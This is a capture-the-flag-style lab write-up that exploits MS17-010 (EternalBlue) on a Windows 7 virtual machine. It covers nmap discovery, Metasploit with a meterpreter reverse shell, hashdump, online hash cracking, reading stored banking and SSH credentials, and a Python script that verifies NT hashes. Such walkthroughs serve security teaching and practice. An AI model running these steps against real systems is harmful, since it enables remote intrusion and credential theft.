The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability."
You can read more about the exploit on Wikipedia or on Avast's blog.
You can download the lab for practice here.
┌──(root💀kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:ab:08:1c, IPv4: 192.168.56.113
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0b (Unknown: locally administered)
192.168.56.100 08:00:27:42:95:84 PCS Systemtechnik GmbH
192.168.56.140 08:00:27:03:9c:8c PCS Systemtechnik GmbH
Alternatively, netdiscover finds the same hosts:
┌──(root💀kali)-[/home/kali]
└─# netdiscover -i eth0
Currently scanning: 192.168.129.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0b 1 60 Unknown vendor
192.168.56.100 08:00:27:42:95:84 1 60 PCS Systemtechnik GmbH
192.168.56.140 08:00:27:03:9c:8c 3 180 PCS Systemtechnik GmbH
┌──(root💀kali)-[/home/kali]
└─# nmap -sC -sV -T4 192.168.56.140
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 08:59 EAT
Nmap scan report for 192.168.56.140
Host is up (0.0013s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:03:9C:8C (Oracle VirtualBox virtual NIC)
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 9h39m58s, deviation: 2h53m12s, median: 7h59m57s
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:03:9c:8c (Oracle VirtualBox virtual NIC)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-10-29T09:00:42-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-29T14:00:42
|_ start_date: 2021-10-29T13:32:46
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.52 seconds
┌──(root💀kali)-[/home/kali]
└─# nmap -p445 --script smb-vuln-ms17-010 192.168.56.140
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 09:05 EAT
Nmap scan report for 192.168.56.140
Host is up (0.00088s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:03:9C:8C (Oracle VirtualBox virtual NIC)
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds
The nmap script confirms the host is unpatched for MS17-010 (CVE-2017-0143). Using the Metasploit Framework, we can exploit this vulnerability as follows:
msf6 > search eternal
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf6 > use 2
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.56.140
RHOSTS => 192.168.56.140
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST eth0
LHOST => eth0
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.56.113:4444
[*] 192.168.56.140:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.56.140:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.56.140:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.56.140:445 - Connecting to target for exploitation.
[+] 192.168.56.140:445 - Connection established for exploitation.
[+] 192.168.56.140:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.56.140:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.56.140:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 192.168.56.140:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 192.168.56.140:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 192.168.56.140:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.56.140:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.56.140:445 - Sending all but last fragment of exploit packet
[*] 192.168.56.140:445 - Starting non-paged pool grooming
[+] 192.168.56.140:445 - Sending SMBv2 buffers
[+] 192.168.56.140:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.56.140:445 - Sending final SMBv2 buffers.
[*] 192.168.56.140:445 - Sending last fragment of exploit packet!
[*] 192.168.56.140:445 - Receiving response from exploit packet
[+] 192.168.56.140:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.56.140:445 - Sending egg to corrupted connection.
[*] 192.168.56.140:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.56.140
[*] Meterpreter session 2 opened (192.168.56.113:4444 -> 192.168.56.140:49157) at 2021-10-29 09:10:25 +0300
[+] 192.168.56.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.56.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.56.140:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter >
At this point, we have successfully gained a meterpreter shell on the target machine. We can explore it further as follows.
meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Meterpreter : x64/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
232 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
304 296 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
352 296 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
360 344 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
388 344 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
448 352 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
456 352 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
464 352 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
556 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
636 448 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
708 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
724 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
768 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
792 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
864 448 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
932 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
952 448 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1140 1860 notepad.exe x64 1 Jon-PC\Jon C:\Windows\system32\NOTEPAD.EXE
1260 1860 calc.exe x64 1 Jon-PC\Jon C:\Windows\system32\calc.exe
1308 448 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1496 448 svchost.exe x64 0 NT AUTHORITY\SYSTEM
1544 448 taskhost.exe x64 1 Jon-PC\Jon C:\Windows\system32\taskhost.exe
1628 556 slui.exe
1652 448 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1836 768 dwm.exe x64 1 Jon-PC\Jon C:\Windows\system32\Dwm.exe
1860 1828 explorer.exe x64 1 Jon-PC\Jon C:\Windows\Explorer.EXE
1916 448 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1948 1860 StikyNot.exe x64 1 Jon-PC\Jon C:\Windows\System32\StikyNot.exe
2012 448 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
meterpreter > screenshot
Screenshot saved to: /home/kali/YvvWwhbp.jpeg
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
meterpreter >
As the output above shows, we can do a lot from here: get system information, list the running processes, grab a screenshot of the user's desktop and, in the worst case, dump the SAM database. The hashdump lines are in pwdump format (user:RID:LM hash:NT hash:::). The LM field aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, which means LM hashing is disabled, and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, so Administrator and Guest have blank passwords. The NT hashes can be cracked offline, or used as they are in a pass-the-hash attack, to move laterally on the target's network.
We cracked Jon's NT hash with the online lookup service CrackStation.
We now have Jon's password: alqfna22
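To make the hashdump output concrete, here is an added example (not part of the original writeup or of Metasploit) that parses pwdump-format lines like the ones above, flags the well-known empty LM and NT hashes, and recomputes an NT hash (MD4 over the UTF-16LE encoding of the password, no salt) so that a candidate password from CrackStation can be verified offline. The three hashdump lines are copied from the output above; the MD4 routine follows RFC 1320 and is written out in full because many OpenSSL 3 builds no longer expose md4 through hashlib.

```python
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password (LM hashing disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


def md4(data: bytes) -> bytes:
    """MD4 as specified in RFC 1320, pure Python so it runs where hashlib lacks md4."""
    s0, s1, s2, s3 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"                       # append the 1 bit
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)          # pad to 56 mod 64
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)  # 64-bit LE bit length
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = s0, s1, s2, s3
        for i in range(16):                                # round 1: F, no constant
            a = _lrot((a + _f(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                # round 2: G, word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _lrot((a + _g(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                # round 3: H, word order 0,8,4,12,2,10,...
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _lrot((a + _h(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        s0, s1, s2, s3 = (s0 + a) & MASK, (s1 + b) & MASK, (s2 + c) & MASK, (s3 + d) & MASK
    return struct.pack("<4I", s0, s1, s2, s3)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); unsalted, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16le")).hex()


def parse_hashdump(text: str):
    """Parse pwdump lines 'user:rid:lmhash:nthash:::' and attach audit flags."""
    accounts = []
    for line in text.strip().splitlines():
        user, rid, lm, nt = line.split(":")[:4]
        accounts.append({
            "user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower(),
            "lm_disabled": lm.lower() == EMPTY_LM,      # LM field is the empty-password LM hash
            "blank_password": nt.lower() == EMPTY_NT,   # NT field is the empty-password NT hash
        })
    return accounts


def verify_crack(password: str, nt: str) -> bool:
    """True when the candidate password reproduces the dumped NT hash."""
    return nt_hash(password) == nt.lower()


# Hashdump lines copied from the meterpreter output above.
DUMP = """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
"""

if __name__ == "__main__":
    for acct in parse_hashdump(DUMP):
        print(f"{acct['user']:<14} rid={acct['rid']:<5} lm_disabled={acct['lm_disabled']} "
              f"blank_password={acct['blank_password']}")
    # Candidate password from CrackStation (see above); a match proves the crack with no network access.
    print("Jon:alqfna22 matches:", verify_crack("alqfna22", "ffb43f0de35be4d9917ac0cc8ad57f8d"))
```

Because the NT hash is unsalted, verification is a single MD4 call, which is also why lookup services such as CrackStation work: a precomputed table maps hash to password directly. The same property means an attacker never needs the plaintext at all; the NT hash by itself authenticates over NTLM (pass-the-hash), so a dumped SAM should be treated as a set of usable credentials, not just material to crack.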
Enumerating the machine further, we find sensitive information in Jon's Documents folder:
meterpreter > ls -la
Listing: C:\Users\Jon\Documents
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:37 +0300 Backups 2015
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:31 +0300 Backups 2016
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:22 +0300 Backups 2017
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:15 +0300 Backups 2018
40777/rwxrwxrwx 0 dir 2021-10-29 16:41:00 +0300 Backups 2019
40777/rwxrwxrwx 0 dir 2021-10-29 16:40:54 +0300 Backups 2020
40777/rwxrwxrwx 0 dir 2021-10-29 16:40:38 +0300 Backups 2021
40777/rwxrwxrwx 4096 dir 2021-10-29 16:38:53 +0300 CLIENTS
100666/rw-rw-rw- 223 fil 2018-12-13 06:49:18 +0300 Confidential.txt
40777/rwxrwxrwx 0 dir 2018-12-13 06:13:31 +0300 My Music
40777/rwxrwxrwx 0 dir 2018-12-13 06:13:31 +0300 My Pictures
40777/rwxrwxrwx 0 dir 2018-12-13 06:13:31 +0300 My Videos
100666/rw-rw-rw- 402 fil 2018-12-13 06:13:45 +0300 desktop.ini
meterpreter > cat Confidential.txt
Banking Credentials
_________________________________
Username: Finance
Password: Password1234Amen
Server Login Credentials
_________________________________
ssh [email protected] -p 20021
Password: Admin@@2021
We can also drop from Meterpreter into a native Windows command shell. There, whoami confirms we are running as NT AUTHORITY\SYSTEM, the most privileged local account, with unrestricted access to all local system resources. This is expected: the exploit corrupts the kernel pool and the payload is injected into a process that already runs as SYSTEM, so no further privilege escalation is needed.
meterpreter > shell
Process 500 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\Jon\Documents>whoami
whoami
nt authority\system
C:\Users\Jon\Documents>
Thanks for reading my writeup. If you have any questions, comments or would like to reach out to me: